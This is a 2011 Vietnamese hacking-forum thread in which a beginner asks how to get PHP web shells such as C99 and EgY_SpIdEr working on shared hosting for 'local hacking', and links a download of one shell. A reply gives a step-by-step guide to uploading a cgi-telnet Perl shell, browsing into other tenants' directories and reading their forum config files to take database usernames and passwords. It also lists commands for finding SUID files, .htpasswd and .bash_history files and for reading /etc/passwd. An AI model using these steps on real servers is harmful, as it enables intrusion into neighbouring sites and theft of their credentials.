[Question] Cần mọi người giúp đỡ về con Shell EgY_SpIdEr ShElL |
04/06/2011 13:23:31 (+0700) | #1 | 238926 |
Nhock_Coi
Member
|
0 |
|
|
Joined: 01/06/2011 11:03:11
Messages: 18
Offline
|
|
Chào mọi người , cảm ơn mọi người đã ghé qua bài biết của em Chúc mọi người luôn vui vẻ và hạnh phúc...
Em vốn không phải là dân IT nhưng vì thấy IT rất thú vị nên em rất đam mê và luôn cố gắng tìm hiểu để có thêm hiểu biết...
Em hiện đang tìm hiểu về vấn đề hack local và bây giờ thì em đang gặp rắc rối một số vấn đề nên em mong mọi người sẽ giúp đỡ em với ạ ( Em đã thử search google vs cả search trong forum rồi mà vẫn không ra nên em mới mạo muội lập Topic làm phiền mọi người ạ )
- Em đã có 1 site của riêng mình và Up được shell lên để tiến hành bước đầu hack local như hướng dẫn...Em up lên site em các con shell như C99 , C57 nhưng khi dẫn link đến Shell thì màn hình trình duyệt chỉ hiện lên trắng xoá hay có mỗi một dấu chấm than (!)...( Hình như Sever đó nó từ chối Shell phải không ạ )Sau đó em thử Up lên 1 con shell có tên là EgY_SpIdEr ShElL thì nó hiện ra một khung yêu cầu đăng nhập .... Cho nên em đã thử đăng nhập bằng tài khoản vào Cpanel mà vẫn không được...
Vậy em viết bài này mong mọi người giúp đỡ...Ai biết thông tin để đăng nhập vào được hay có cách nào khác để Up shell lên host và sử dụng được thì giúp em với ạ....
Em cảm ơn mọi người rất nhiều...!!! |
|
|
|
|
[Question] Cần mọi người giúp đỡ về con Shell EgY_SpIdEr ShElL |
04/06/2011 13:30:52 (+0700) | #2 | 238932 |
Nhock_Coi
Member
|
0 |
|
|
Joined: 01/06/2011 11:03:11
Messages: 18
Offline
|
|
Con Shell đó đây ạ http://www.mediafire.com/?pnzdyxjnvkmk8dx |
|
|
|
|
[Question] Cần mọi người giúp đỡ về con Shell EgY_SpIdEr ShElL |
04/06/2011 14:36:28 (+0700) | #3 | 238957 |
Nhock_Coi
Member
|
0 |
|
|
Joined: 01/06/2011 11:03:11
Messages: 18
Offline
|
|
Không ai giúp em con này thì giúp em cách cử dụng con rv007 vậy.... |
|
|
|
|
[Question] Cần mọi người giúp đỡ về con Shell EgY_SpIdEr ShElL |
04/06/2011 15:30:54 (+0700) | #4 | 238968 |
theme
Member
|
0 |
|
|
Joined: 03/06/2011 10:44:00
Messages: 8
Offline
|
|
Hình như bạn nhập sai pass! hãy về file shell đó mở bằng notepab! trong đó có pass sẵn cho bạn! |
|
|
|
|
[Question] Cần mọi người giúp đỡ về con Shell EgY_SpIdEr ShElL |
04/06/2011 15:34:47 (+0700) | #5 | 238970 |
Nhock_Coi
Member
|
0 |
|
|
Joined: 01/06/2011 11:03:11
Messages: 18
Offline
|
|
|
|
[Question] Cần mọi người giúp đỡ về con Shell EgY_SpIdEr ShElL |
04/06/2011 15:47:37 (+0700) | #6 | 238974 |
theme
Member
|
0 |
|
|
Joined: 03/06/2011 10:44:00
Messages: 8
Offline
|
|
her! ko có gì! toàn chữ gì ko à! bác nào xem nha! mình down con shell của bạn về nhưng mà khi mở toàn chữ! ký tự gì! ko đọc dc |
|
|
|
|
[Question] Cần mọi người giúp đỡ về con Shell EgY_SpIdEr ShElL |
04/06/2011 15:49:38 (+0700) | #7 | 238976 |
theme
Member
|
0 |
|
|
Joined: 03/06/2011 10:44:00
Messages: 8
Offline
|
|
bạn thử dùng cái này xem cgitelnet ! mở bằng notepab để xem pass nha |
|
|
|
|
[Question] Cần mọi người giúp đỡ về con Shell EgY_SpIdEr ShElL |
04/06/2011 15:57:13 (+0700) | #8 | 238981 |
Nhock_Coi
Member
|
0 |
|
|
Joined: 01/06/2011 11:03:11
Messages: 18
Offline
|
|
theme wrote:
bạn thử dùng cái này xem cgitelnet ! mở bằng notepab để xem pass nha
Dạ . anh hướng dẫn sơ qua về con này giúp em với được không ạ . Thank anh nhiều |
|
|
|
|
[Question] Cần mọi người giúp đỡ về con Shell EgY_SpIdEr ShElL |
04/06/2011 16:01:07 (+0700) | #9 | 238982 |
theme
Member
|
0 |
|
|
Joined: 03/06/2011 10:44:00
Messages: 8
Offline
|
|
Mình cũng gà lắm nhưng mà đọc tài liệu! mình gửi chắc bạn sẽ hiểu:
Điều kiện cần :
+Bạn cần phải up 1 file view.pl ( cgi-telnet.pl ) lên host mình để hack, chmod 775 nhé !
+ Các lệnh để hack :
ls -al : lệnh này để xem thông tin
cd : lệnh này dùng để chuyển thư mục
Cat : lệnh này dùng để xem info database
Thường, với bảo mật ko quá cao, bạn chỉ cần dùng 3 lệnh cơ bản này là đủ rôì nhé !!
+ Tiến hành :
Sau khi up lên host, bạn chạy con view.pl nhé , khi đó nó sẽ đưa lên 1 màn hình đen để hack , bạn nhập pass vào nhé …
+ sau khi nhập pass, bạn sẽ có đường dẫn là : [admin@www.tênweb/home/kc/public_html/cgi-bin] , đây là đường dẫn đầu tiên từ host của bạn , bạn dùng lệnh cd /home/ , khi đó đường dẫn sẽ là [admin@www.tênweb/home] , bạn dùng lệnh ls -al để xem tất cả các host đang ở cùng trên sever của bạn. vd như chúng ta sẽ hack host của hoangtudaumat , bạn tiếp tục dùng lệnh cd hoangtudaumat , khi đó sẽ có đường dẫn là : [admin@teneb/home/hoangtudaumat/] , khi này , các bạn cần phải dùng lệnh chuyển đến public nhé , vẫn dùng lệnh : cd public_html , khi này , bạn đã có đường dẫn là [admin@tenweb/home/hoangtudaumat/public_html] , để xem các thư mục của public, bạn dùng lệnh ls -al nhé , khi này, các bạn sẽ thấy các tập tin như :forums . index.html …..
*** Bổ sung : Một hosting có cấu tạo thường là thư mục public_html sẽ chứa những gì “được hiện ra” trên web của victim , do đó bạn muốn tìm đến forum hay guessbook thì nên tìm tại đây . Nên tìm hiểu cấu trúc của hosting trước khi hack local **
Ðể hack , bạn tiếp tục dùng lệnh cd forum , khi đó , đường dẫn của bạn sẽ là [admin@tenweb/home/hoangtudaumat/public_html/forum] , bạn tiếp tục dùng lệnh ls -al để xem , các bạn sẽ thấy các file :conf_global.php , downloads_config.php …… , để xem thông tin của database , bạn dùng lệnh cat conf_global.php nhé , khi này, bạn đã giử được database ở trong tay rồi đấy ,
User database là $INFO['sql_database']
Pass database là $INFO['sql_pass']
sau đó muốn tìm hiểu nó có những cmd nào thì cứ type : help
muốn tìm hiếu sâu hơn : info …. vidụ tôi muốn hiểu ls là cái gì : info ls
đây là vài cmd mà hay dùng :
find
find / -type f -perm -04000 -ls : tìm tất cả suid file
find / -type f -perm -02000 -ls : tìm tất cả sgid files
find / -type f -name : tìm config.inc.php
find / -type f -name \”config*\ : tìm file config
find / -perm -2 -ls”), tìm file,folders cho phép ghi
find / -type f -name service.pwd :find all service.pwd files
find / -type f -name .htpasswd :find all .htpasswd files
find / -type f -name .bash_history,: find all .bash_history files
———————————————————
netstat -an | grep -i listen :show opened ports
netstat -an :show opened ports
————————————————
cat /etc/passwd :list user <+++ du`ng !
cat / etc/userdomains :View cpanel user-domains logs
cat /var/cpanel/accounting.log: View cpanel logs
cat /usr/local/apache/conf/httpd.conf : Aache configuration
cat /etc/httpd.conf :Apache configuration
cat /etc/syslog.conf :Syslog configuration
cat /etc/motd :Message Of The Day |
|
|
|
|
[Question] Cần mọi người giúp đỡ về con Shell EgY_SpIdEr ShElL |
04/06/2011 16:11:44 (+0700) | #10 | 238990 |
Nhock_Coi
Member
|
0 |
|
|
Joined: 01/06/2011 11:03:11
Messages: 18
Offline
|
|
Em đã làm như anh hướng dẫn...Nhưng khi Up lên host xong rồi em tiến hành gõ vô trình duyệt để chạy với đường dẫn như thế này mydomain/upload/view.pl ( my domain là hos của em ) thì nó tự động tải 1 file view.pl về chứ nó không hiện ra trang gì cả anh ạ |
|
|
[Question] Cần mọi người giúp đỡ về con Shell EgY_SpIdEr ShElL |
04/06/2011 16:36:13 (+0700) | #11 | 238999 |
theme
Member
|
0 |
|
|
Joined: 03/06/2011 10:44:00
Messages: 8
Offline
|
|
Bạn tạo 1 sub domain nếu bạn dùng hót free! lúc đó bạn up shell bên trong thư mục htdos của domain bạn! sau đó bạn chạy nó là dc! bạn ko thể lấy my domain là hót |
|
|
|